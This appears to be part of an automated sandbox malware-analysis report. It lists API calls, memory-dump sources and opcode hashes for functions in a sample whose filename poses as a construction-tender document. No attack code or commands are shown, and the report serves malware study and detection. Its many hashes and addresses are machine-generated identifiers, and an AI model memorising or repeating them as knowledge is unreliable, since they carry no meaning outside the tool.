                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                                          • String ID: 8
                                                                                                                          • API String ID: 1453599865-4194326291
                                                                                                                          • Opcode ID: 670ee7b5490c677f5f659b485134598271d45b614e600b4a2b45cb0bab07c41e
                                                                                                                          • Instruction ID: d62a850ae7ae8d252436c59f910a95d891cc4c78108d860f1a787b3ec39cc5b5
                                                                                                                          • Opcode Fuzzy Hash: 670ee7b5490c677f5f659b485134598271d45b614e600b4a2b45cb0bab07c41e
                                                                                                                          • Instruction Fuzzy Hash: 6A01B971A44204FFD700AFB09E89EAF7278EF51719F20043BB102B61D1C2BC4D41962D
                                                                                                                          Function 332B4B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,332B4AEA,?,?,332B4A8A,?,332C2238,?,332B4BBD,00000000,00000000), ref: 332B4B59
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 332B4B6C
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,332B4AEA,?,?,332B4A8A,?,332C2238,?,332B4BBD,00000000,00000000,00000001,332B2082), ref: 332B4B8F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                          • Opcode ID: c541994c545a05dd0df6a00c3dbc2eda7b9c80b4458792cd0592b0507cb9e9a0
                                                                                                                          • Instruction ID: 6a062ebdfd571374a7aeda09c076553d1d09b4082c3fe27d9a8f7938ffa172df
                                                                                                                          • Opcode Fuzzy Hash: c541994c545a05dd0df6a00c3dbc2eda7b9c80b4458792cd0592b0507cb9e9a0
                                                                                                                          • Instruction Fuzzy Hash: 8DF04F75900209BFDF11AF90C84CFDDBFF9EF04791F4081A8E905A6150EB719982CB90
                                                                                                                          Function 00401752 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,00409598,00435000,?,?,00000031), ref: 00401793
                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,00409598,00409598,00000000,00000000,00409598,00435000,?,?,00000031), ref: 004017B8
                                                                                                                            • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                            • Part of subcall function 00405234: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                                                                            • Part of subcall function 00405234: SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1941528284-0
                                                                                                                          • Opcode ID: 9a76f258c171755f82fb3be27d8a42dc7cbb0b331fc04bebc01a9be84b2c0181
                                                                                                                          • Instruction ID: 76b650aa9cc6b75c6122964d1cb95a98820e0ebeeaa58c8a998697c6af8370a7
                                                                                                                          • Opcode Fuzzy Hash: 9a76f258c171755f82fb3be27d8a42dc7cbb0b331fc04bebc01a9be84b2c0181
                                                                                                                          • Instruction Fuzzy Hash: 6A41A371904509BACF117BB5CC45DAF36B9EF05368F20423BF421B21E1D73C8A419A6E
                                                                                                                          Function 332B15DA Relevance: 7.6, APIs: 5, Instructions: 84stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _strlen.LIBCMT ref: 332B1607
                                                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,332B190E,?,?,00000000,?,00000000), ref: 332B1643
                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,332B190E,?,?,00000000,?,00000000,?,?,?,?), ref: 332B165A
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,332B190E,?,?,00000000,?,00000000,?,?,?,?,?), ref: 332B1661
                                                                                                                          • lstrcatW.KERNEL32(00001008,?,?,?,?,?,332B190E,?,?,00000000,?,00000000,?,?,?,?), ref: 332B1686
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcatlstrlen$_strlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3802368996-0
                                                                                                                          • Opcode ID: bee4ca4aa30fead6ea417435c2dc8e267d43d1a7c28d7b15eaf62bd3f7ef0030
                                                                                                                          • Instruction ID: aeafe91e631b384c37b764d66dd06f21ba76b09e5dfe78acccef77bdb5f51871
                                                                                                                          • Opcode Fuzzy Hash: bee4ca4aa30fead6ea417435c2dc8e267d43d1a7c28d7b15eaf62bd3f7ef0030
                                                                                                                          • Instruction Fuzzy Hash: A1219836D00304ABDB059F54DC85EEE77B8EF88750F14842AE605EB141EB74A58687A5
                                                                                                                          Function 332B7153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 332B715C
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 332B717F
                                                                                                                            • Part of subcall function 332B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 332B5702
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 332B71A5
                                                                                                                          • _free.LIBCMT ref: 332B71B8
                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 332B71C7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 336800556-0
                                                                                                                          • Opcode ID: 2dc11ae8fbde734a8a26f8ada86a1a7ef9e0c8c1b8ddc2aeb2dead4f4db8fbec
                                                                                                                          • Instruction ID: 556e4019f012f3c00b701b3a5a81175f44799e9bfb6ac112ced8ef880bc9064e
                                                                                                                          • Opcode Fuzzy Hash: 2dc11ae8fbde734a8a26f8ada86a1a7ef9e0c8c1b8ddc2aeb2dead4f4db8fbec
                                                                                                                          • Instruction Fuzzy Hash: 4B0188B6A21B157F6B111ABE4C4CD7B6E7DDEC6EE03544529BD04DB340EE608C4291B0
                                                                                                                          Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1912718029-0
                                                                                                                          • Opcode ID: 655caf0860b8898067121cc846cd92bce4ad13f55364dba073aaa87c58243772
                                                                                                                          • Instruction ID: 973325e0aa9a645a651b6ee30753ebbcc0ecd75d5609573519e3086a48bf95c6
                                                                                                                          • Opcode Fuzzy Hash: 655caf0860b8898067121cc846cd92bce4ad13f55364dba073aaa87c58243772
                                                                                                                          • Instruction Fuzzy Hash: 31113A71904008FEEF229F90DE89EAE3B79FB54348F104476FA05B11A0D3B59E51EA69
                                                                                                                          Function 332B5B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000,332B636D,332B5713,00000000,?,332B2249,?,?,332B1D66,00000000,?,?,00000000), ref: 332B5B7F
                                                                                                                          • _free.LIBCMT ref: 332B5BB4
                                                                                                                          • _free.LIBCMT ref: 332B5BDB
                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B5BE8
                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B5BF1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3170660625-0
                                                                                                                          • Opcode ID: c9cee85c0ea4d6b9b2b485a1fc5bd71c47eaf98e29e66177fa9fff693d32df30
                                                                                                                          • Instruction ID: 15135f4e011ac0c964d43010eccd39c2d0062fae2ada580c87943bf183537bc2
                                                                                                                          • Opcode Fuzzy Hash: c9cee85c0ea4d6b9b2b485a1fc5bd71c47eaf98e29e66177fa9fff693d32df30
                                                                                                                          • Instruction Fuzzy Hash: 9801F47A605B02AFEE032A349C88D5F2ABE9FC56F07344524F955AE145EEB488C34164
                                                                                                                          Function 332B1E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,332B10DF,?,?,?,00000000), ref: 332B1E9A
                                                                                                                          • lstrcatW.KERNEL32(?,?,?,332B10DF,?,?,?,00000000), ref: 332B1EAC
                                                                                                                          • lstrlenW.KERNEL32(?,?,332B10DF,?,?,?,00000000), ref: 332B1EB3
                                                                                                                          • lstrlenW.KERNEL32(?,?,332B10DF,?,?,?,00000000), ref: 332B1EC8
                                                                                                                          • lstrcatW.KERNEL32(?,332B10DF,?,332B10DF,?,?,?,00000000), ref: 332B1ED3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 493641738-0
                                                                                                                          • Opcode ID: 6a2012f4ce73ba8e63057cd5b2712d2bfebd42ecd816d6ff82e03a9c7262a978
                                                                                                                          • Instruction ID: 1815f65dc6c5c97ea6f2bdcc7cd13bb7b8643788acb879e3c5e0472ab15ac79c
                                                                                                                          • Opcode Fuzzy Hash: 6a2012f4ce73ba8e63057cd5b2712d2bfebd42ecd816d6ff82e03a9c7262a978
                                                                                                                          • Instruction Fuzzy Hash: B1F08926500214BAD6213B19EC89EBF7B7CEFC5BA0F444419F50893190EB55684393F5
                                                                                                                          Function 332B91B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 332B91D0
                                                                                                                            • Part of subcall function 332B571E: HeapFree.KERNEL32(00000000,00000000,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?), ref: 332B5734
                                                                                                                            • Part of subcall function 332B571E: GetLastError.KERNEL32(?,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?,?), ref: 332B5746
                                                                                                                          • _free.LIBCMT ref: 332B91E2
                                                                                                                          • _free.LIBCMT ref: 332B91F4
                                                                                                                          • _free.LIBCMT ref: 332B9206
                                                                                                                          • _free.LIBCMT ref: 332B9218
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 9caf3fd69cf1ba5ef26b105286d8ef33565ca21a20ff21aa312997c5c9f8edb3
                                                                                                                          • Instruction ID: c63366983e4c2ee629625164b82e868f1f56007f8dd8d33f5a6b185025a7bbfc
                                                                                                                          • Opcode Fuzzy Hash: 9caf3fd69cf1ba5ef26b105286d8ef33565ca21a20ff21aa312997c5c9f8edb3
                                                                                                                          • Instruction Fuzzy Hash: 77F06DB1A142419B8E50EB5AE6C8C0A7FF9EE047A13A44C05F949EB904CB74F8C09EA0
                                                                                                                          Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1849352358-0
                                                                                                                          • Opcode ID: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                                                                                          • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                                                                                          • Opcode Fuzzy Hash: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                                                                                          • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                                          Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(?), ref: 00401D44
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                                          • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3808545654-0
                                                                                                                          • Opcode ID: 3d10640cf75f264bc6b4d99a4bec16fe66d8b8c39a1604d1ba5a7bd99958a89c
                                                                                                                          • Instruction ID: 8995593179462595128303b368e9330df260c28bd2cead9704070f65c6b7920e
                                                                                                                          • Opcode Fuzzy Hash: 3d10640cf75f264bc6b4d99a4bec16fe66d8b8c39a1604d1ba5a7bd99958a89c
                                                                                                                          • Instruction Fuzzy Hash: 1F016D71948285EFEB416BB0AE0AFDABF74EB65305F144479F201B62E2C77C10058B6E
                                                                                                                          Function 332B5351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 332B536F
                                                                                                                            • Part of subcall function 332B571E: HeapFree.KERNEL32(00000000,00000000,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?), ref: 332B5734
                                                                                                                            • Part of subcall function 332B571E: GetLastError.KERNEL32(?,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?,?), ref: 332B5746
                                                                                                                          • _free.LIBCMT ref: 332B5381
                                                                                                                          • _free.LIBCMT ref: 332B5394
                                                                                                                          • _free.LIBCMT ref: 332B53A5
                                                                                                                          • _free.LIBCMT ref: 332B53B6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: dd9b04a6b72f4512202059b3babe38fbce788e1896299cd1ceb2a7dcb2a913b6
                                                                                                                          • Instruction ID: f116ec8b3f6bcabd313b04b379c4ef27e83834344060324d347c04b9309c15c5
                                                                                                                          • Opcode Fuzzy Hash: dd9b04a6b72f4512202059b3babe38fbce788e1896299cd1ceb2a7dcb2a913b6
                                                                                                                          • Instruction Fuzzy Hash: 60F030B0D24211DF8A027F29D5C8C493FF1BF0EA90325890AF911BB255D7B904C39B81
                                                                                                                          Function 332B4BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,?), ref: 332B4C1D
                                                                                                                          • _free.LIBCMT ref: 332B4CE8
                                                                                                                          • _free.LIBCMT ref: 332B4CF2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                          • String ID: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                          • API String ID: 2506810119-3394933079
                                                                                                                          • Opcode ID: a9023d1e3eb5025ab5e9b0a062ce952e4ff2f873b019e9b96c5038ba1d88961a
                                                                                                                          • Instruction ID: 04837e739122f061ec4b224a9195c6993adce21a7eef22ce4e1baca72b2b4c6c
                                                                                                                          • Opcode Fuzzy Hash: a9023d1e3eb5025ab5e9b0a062ce952e4ff2f873b019e9b96c5038ba1d88961a
                                                                                                                          • Instruction Fuzzy Hash: DB316DB5A00319AFDF11DF99C8C4D9EBBFCEF89790B148466E904A7210D6B59AC1CB60
                                                                                                                          Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                          • String ID: !
                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                          • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                                          • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                                                                                          • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                                          • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                                          Function 332B86E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,332B6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 332B8731
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 332B87BA
                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 332B87CC
                                                                                                                          • __freea.LIBCMT ref: 332B87D5
